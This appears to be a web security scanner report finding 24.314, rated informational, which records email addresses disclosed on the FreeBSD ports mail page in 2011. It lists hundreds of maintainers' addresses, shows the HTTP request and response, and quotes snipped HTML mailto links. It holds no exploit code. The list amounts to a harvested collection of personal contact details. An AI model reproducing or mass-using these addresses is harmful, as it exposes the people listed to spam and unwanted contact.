<A HREF="mailto:vanilla@FreeBSD.org">vanilla@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:haskell@FreeBSD.org">haskell@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jasone@FreeBSD.org">jasone@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:micho@matem.unam.mx">micho@matem.unam.mx</A>
...[SNIP]...
<A HREF="mailto:gjb@FreeBSD.org">gjb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gjb@FreeBSD.org">gjb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:swills@FreeBSD.org">swills@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lth@FreeBSD.org">lth@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:swills@FreeBSD.org">swills@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:milki@rescomp.berkeley.edu">milki@rescomp.berkeley.edu</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:milki@rescomp.berkeley.edu">milki@rescomp.berkeley.edu</A>
...[SNIP]...
<A HREF="mailto:flo@smeets.im">flo@smeets.im</A>
...[SNIP]...
<A HREF="mailto:tobez@FreeBSD.org">tobez@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joel@FreeBSD.org">joel@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:glarkin@FreeBSD.org">glarkin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vmagerya@gmail.com">vmagerya@gmail.com</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:eg@fbsd.lt">eg@fbsd.lt</A>
...[SNIP]...
<A HREF="mailto:knu@FreeBSD.org">knu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:admin@lissyara.su">admin@lissyara.su</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:bapt@FreeBSD.org">bapt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beyert@cs.ucr.edu">beyert@cs.ucr.edu</A>
...[SNIP]...
<A HREF="mailto:osa@FreeBSD.org">osa@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jnlin@csie.nctu.edu.tw">jnlin@csie.nctu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:g.gonter@ieee.org">g.gonter@ieee.org</A>
...[SNIP]...
<A HREF="mailto:mva@FreeBSD.org">mva@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:saturnero@gufi.org">saturnero@gufi.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:python@FreeBSD.org">python@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:estrabd@gmail.com">estrabd@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:olgeni@FreeBSD.org">olgeni@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:g.gonter@ieee.org">g.gonter@ieee.org</A>
...[SNIP]...
<A HREF="mailto:g.gonter@ieee.org">g.gonter@ieee.org</A>
...[SNIP]...
<A HREF="mailto:bob@eager.cx">bob@eager.cx</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ruby@FreeBSD.org">ruby@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sahil@FreeBSD.org">sahil@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nmh@t3x.org">nmh@t3x.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mitsururike@gmail.com">mitsururike@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:erik@bz.bzflag.bz">erik@bz.bzflag.bz</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tijl@coosemans.org">tijl@coosemans.org</A>
...[SNIP]...
<A HREF="mailto:tijl@coosemans.org">tijl@coosemans.org</A>
...[SNIP]...
<A HREF="mailto:numisemis@yahoo.com">numisemis@yahoo.com</A>
...[SNIP]...
<A HREF="mailto:numisemis@yahoo.com">numisemis@yahoo.com</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nmh@t3x.org">nmh@t3x.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:berend@pobox.com">berend@pobox.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:joemann@beefree.free.de">joemann@beefree.free.de</A>
...[SNIP]...
<A HREF="mailto:joemann@beefree.free.de">joemann@beefree.free.de</A>
...[SNIP]...
<A HREF="mailto:wes@FreeBSD.org">wes@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:citric@cubicone.tmetic.com">citric@cubicone.tmetic.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mutoh@openedu.org">mutoh@openedu.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:java@FreeBSD.org">java@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vmagerya@gmail.com">vmagerya@gmail.com</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:g.gonter@ieee.org">g.gonter@ieee.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nmh@t3x.org">nmh@t3x.org</A>
...[SNIP]...
<A HREF="mailto:kris@FreeBSD.org">kris@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:saper@saper.info">saper@saper.info</A>
...[SNIP]...
<A HREF="mailto:amdmi3@FreeBSD.org">amdmi3@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:amdmi3@FreeBSD.org">amdmi3@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:michael.grunewald@laposte.net">michael.grunewald@laposte.net</A>
...[SNIP]...
<A HREF="mailto:andrewb@cs.cmu.edu">andrewb@cs.cmu.edu</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:wenheping@gmail.com">wenheping@gmail.com</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:llwang@infor.org">llwang@infor.org</A>
...[SNIP]...
<A HREF="mailto:rodrigo@bebik.net">rodrigo@bebik.net</A>
...[SNIP]...
<A HREF="mailto:coumarin@gmail.com">coumarin@gmail.com</A>
...[SNIP]...
<A HREF="mailto:coumarin@gmail.com">coumarin@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mm@FreeBSD.org">mm@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tsparks@appliedops.net">tsparks@appliedops.net</A>
...[SNIP]...
<A HREF="mailto:johnson.peter@gmail.com">johnson.peter@gmail.com</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vmagerya@gmail.com">vmagerya@gmail.com</A>
...[SNIP]...
<A HREF="mailto:kevlo@FreeBSD.org">kevlo@FreeBSD.org</A>
...[SNIP]...

24.314. http://www.freebsd.org/ports/mail.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/mail.html

Issue detail

The following email addresses were disclosed in the response:

A.J.Caines@halplant.com
Olivier.Girard@univ-angers.fr
ache@FreeBSD.org
ache@freebsd.org
acm@FreeBSD.org
admin@lissyara.su
ale@FreeBSD.org
alexey@renatasystems.org
anarcat@anarcat.ath.cx
anders@FreeBSD.org
andrew@arda.homeunix.net
andrew@ugh.net.au
aragon@phat.za.net
araujo@FreeBSD.org
arensb+freebsd-ports@ooblick.com
ashish@FreeBSD.org
ast@treibsand.com
avatar@mmlab.cse.yzu.edu.tw
avg@icyb.net.ua
avk@vl.ru
avl@FreeBSD.org
ayu@commun.jp
bapt@FreeBSD.org
bart@tapolsky.net.ua
bc979@lafn.org
beat@FreeBSD.org
beech@FreeBSD.org
bill.brinzer@gmail.com
boris@tagnet.ru
bra@fsn.hu
bsam@FreeBSD.org
bsd-sharp@googlegroups.com
bsd@dino.sk
buganini@gmail.com
c0rn@o2.pl
cgreen@sentex.net
chalpin@cs.wisc.edu
chifeng@gmail.com
christer.edwards@gmail.com
citycat4@ngs.ru
clsung@FreeBSD.org
contact@dancingfortune.com
craig001@lerwick.hopto.org
dan@langille.org
dean@odyssey.apana.org.au
decke@FreeBSD.org
delphij@FreeBSD.org
delphus@gmail.com
demon@FreeBSD.org
dgeo@ec-marseille.fr
dhn@FreeBSD.org
dimma@higis.ru
dinoex@FreeBSD.org
dougb@FreeBSD.org
drixter@e-utp.net
drs@rucus.ru.ac.za
dsh@wizard.volgograd.ru
edwin@mavetju.org
ehaupt@FreeBSD.org
eksffa@freebsdbrasil.com.br
email-ports@def-defying.com
faber@isi.edu
fbsd@opal.com
fernan@iib.unsam.edu.ar
fjoe@FreeBSD.org
flo@smeets.im
fmysh@iijmio-mail.jp
forsite@spamtest.ru
freebsd-ports@t-b-o-h.net
freebsd@netfence.it
freebsdports@chillibear.com
futurebsd@infoseek.to
fw@moov.de
g.gonter@ieee.org
gahr@FreeBSD.org
garga@FreeBSD.org
gecko@FreeBSD.org
georg@graf.priv.at
girgen@FreeBSD.org
gjb@FreeBSD.org
glarkin@FreeBSD.org
gmarco@gufi.org
gmc@sonologic.nl
gnome@FreeBSD.org
greenwood.andy@gmail.com
gromnizki@unixdev.net
gshapiro@FreeBSD.org
gslin@gslin.org
gsutter@zer0.org
hans@nordhaug.priv.no
haskell@FreeBSD.org
hiroto.kagotani@gmail.com
hubert@frbsd.org
ian@freislich.nom.za
info@otsune.com
ismail.yenigul@endersys.com.tr
ismail@EnderUNIX.org
itetcu@FreeBSD.org
jack@jarasoft.net
jadawin@FreeBSD.org
james@now.ie
janos.mohacsi@bsd.hu
jf@dockes.org
jhein@symmetricom.com
jjuanino@gmail.com
jmelo@FreeBSD.org
joehorn@gmail.com
johans@FreeBSD.org
john.c.prather@gmail.com
john@jnielsen.net
johnpupu@gmail.com
jonny@jonny.eng.br
jtrigg@spamcop.net
kay.abendroth@raxion.net
kde@FreeBSD.org
kevlo@FreeBSD.org
kiwi@oav.net
klammer@webonaut.com
kline@thought.org
knu@FreeBSD.org
koj@ofug.net
krion@FreeBSD.org
kuriyama@FreeBSD.org
kwm@FreeBSD.org
lambert@lambertfam.org
lasse@freebsdcluster.org
leeym@FreeBSD.org
ler@lerctr.org
lioux@FreeBSD.org
lippe@FreeBSD.org
loos.br@gmail.com
lth@FreeBSD.org
lukasz@wasikowski.net
m.seaman@infracaninophile.co.uk
mail@ozzmosis.com
mandree@FreeBSD.org
marc@pilgerer.org
mark_sf@kikg.ifmo.ru
mashtizadeh@gmail.com
matusita@FreeBSD.org
mbr@FreeBSD.org
mcdouga9@egr.msu.edu
me@mortis.eu
mi@aldan.algebra.com
mich@FreeBSD.org
michael@ranner.eu
mij@bitchx.it
mike@tric.tomsk.gov.ru
miwi@FreeBSD.org
mjl@luckie.org.nz
mm@FreeBSD.org
mnag@FreeBSD.org
mono@FreeBSD.org
mopsfelder@gmail.com
morinaga@riken.jp
moro@remus.dti.ne.jp
motoyuki@freebsd.org
mwill@spingen.com
mwisnicki+freebsd@gmail.com
naddy@FreeBSD.org
neal@nelson.name
neil@darlow.co.uk
netchild@FreeBSD.org
nick@foobar.org
nivit@FreeBSD.org
nobutaka@FreeBSD.org
nohtml@tundraware.com
nork@FreeBSD.org
novel@FreeBSD.org
obrien@FreeBSD.org
ohauer@FreeBSD.org
oleg@mamontov.net
oliver@FreeBSD.org
os@rsu.ru
otaviof@gmail.com
oz@nixil.net
ozkan@enderunix.org
pankov_p@mail.ru
pav@FreeBSD.org
perl@FreeBSD.org
ports.maintainer@evilphi.com
ports@FreeBSD.org
ports@christianserving.org
prehor@gmail.com
python@FreeBSD.org
question+fbsdports@closedsrc.org
rafan@FreeBSD.org
ricardo.katz@gmail.com
rnejdl@ringofsaturn.com
roam@FreeBSD.org
robtone@ek-muc.de
romain@FreeBSD.org
ruby@FreeBSD.org
sahil@FreeBSD.org
saturnero@gufi.org
scheidell@secnap.net
scott+ports@sabami.seaslug.org
sem@FreeBSD.org
sergei@FreeBSD.org
sexbear@tmu.edu.tw
simond@irrelevant.org
sjroz@verizon.net
skreuzer@FreeBSD.org
skv@FreeBSD.org
snabb@epipe.com
snowfly@yuntech.edu.tw
st@be.to
stas@FreeBSD.org
stb@lassitu.de
stefan@FreeBSD.org
support@spectrum.ru
sylvio@FreeBSD.org
tabmow@freenode.net
tabthorpe@FreeBSD.org
tabthorpe@freebsd.org
tad@vif.com
tarkhil@over.ru
tdb@FreeBSD.org
tedm@ipinc.net
terry@sucked-in.com
thierry@FreeBSD.org
thomas@bsdunix.ch
tjs@cdpa.nsysu.edu.tw
tmseck@netcologne.de
toasty@dragondata.com
tobez@FreeBSD.org
toha@toha.org.ua
tota@FreeBSD.org
treif@mayn.de
tundra@tundraware.com
udo.schweigert@siemens.com
ume@FreeBSD.org
umq@ueo.co.jp
utisoft@gmail.com
vd@FreeBSD.org
victor@bsdes.net
vivek@khera.org
vk@vk.pp.ru
vsevolod@FreeBSD.org
vvelox@vvelox.net
wes@FreeBSD.org
wolf@priori.net
wosch@FreeBSD.org
wxs@FreeBSD.org
x11@FreeBSD.org
xi@borderworlds.dk
xride@FreeBSD.org
yaizawa@2004.jukuin.keio.ac.jp
yanagisawa@csg.is.titech.ac.jp
yasu@utahime.org
yds@CoolRat.org
yuanjue@FreeBSD.org
zakj@nox.cx

Request

GET /ports/mail.html HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "610696267"
Last-Modified: Sun, 23 Jan 2011 02:29:32 GMT
Content-Length: 1439956
Connection: close
Date: Mon, 24 Jan 2011 16:16:34 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: Mail</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/ht
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:stas@FreeBSD.org">stas@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:prehor@gmail.com">prehor@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:janos.mohacsi@bsd.hu">janos.mohacsi@bsd.hu</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ashish@FreeBSD.org">ashish@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:contact@dancingfortune.com">contact@dancingfortune.com</A>
...[SNIP]...
<A HREF="mailto:tad@vif.com">tad@vif.com</A>
...[SNIP]...
<A HREF="mailto:araujo@FreeBSD.org">araujo@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rnejdl@ringofsaturn.com">rnejdl@ringofsaturn.com</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:umq@ueo.co.jp">umq@ueo.co.jp</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mandree@FreeBSD.org">mandree@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mandree@FreeBSD.org">mandree@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mandree@FreeBSD.org">mandree@FreeBSD.org</A>
...[SNIP]...
